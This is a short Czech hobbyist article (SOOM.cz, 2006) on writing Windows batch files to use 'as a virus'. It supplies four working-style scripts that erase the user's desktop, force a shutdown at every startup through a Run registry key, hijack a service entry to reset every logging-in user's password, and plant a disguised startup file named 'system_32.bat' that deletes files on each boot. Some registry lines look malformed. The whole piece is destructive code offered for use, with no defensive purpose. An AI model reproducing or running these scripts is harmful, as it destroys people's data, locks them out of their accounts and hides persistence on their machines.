Virus v CMD

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: kitamgelf
Datum: 13.12.2006
Hodnocení/Hlasovalo: 2/6

Tento článek bude popisovat jak si vytvořit "obyčejnou" cmdline, která by se mohla využít i jako virus.

Je to velmi jednoduché, každý z vás asi ví, že s příkazovým řádkem se dají dělat velké věci a proto zde napíšu pár zajímavých příkazů.

1. příkaz který smaže plochu aktuálního uživatele:
echo off 
erase /q /s "%homedrive%\documents and settings\%username%\plocha\*.*"
ten potom napíšete do poznámkového bloku a obyčejně změníte příponu na *.cmd stejně jako u všech zde uvedených příkazů.


2. příkaz restartuje počítač při každém spuštění winu:
echo off 
echo  Windows Registry Editor Version 5.00o > %homedrive%\windows\z.reg 
echo.>> %homedrive%\windows\z.reg 
echo  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\z.reg 
echo  "system_tray"="shutdown -s -f -t 0" >> %homedrive%\windows\z.reg 
reg import %homedrive%\windows\z.reg


3. příkaz, který změní heslo všem uživatelům, kteří se přihlásí (heslo bude změněno na "matrix"):
echo off 
echo  Windows Registry Editor Version 5.00o > %homedrive%\windows\x.reg 
echo.>> %homedrive%\windows\x.reg 
echo  [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AudioSrv] >> %homedrive%\windows\x.reg 
echo.>> %homedrive%\windows\x.reg 
echo  "ImagePath"="net user %%username%% matrix ">> %homedrive%\windows\x.reg 
reg import %homedrive%\windows\x.reg 


4. a poslední příkaz bude mazat plochu po každém startu win:
echo off 
echo  Windows Registry Editor Version 5.00o > %homedrive%\windows\y.reg 
echo.>> %homedrive%\windows\y.reg 
echo  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\y.reg 
echo  "ImagePath"="%homedrive%\\windows\\system_32.bat">> %homedrive%\windows\y.reg 
reg import %homedrive%\windows\y.reg 
echo erase /q /s "%homedrive%\documents and settings\%username%\plocha\*.*" > "%homedrive%\\windows\\system_32.bat"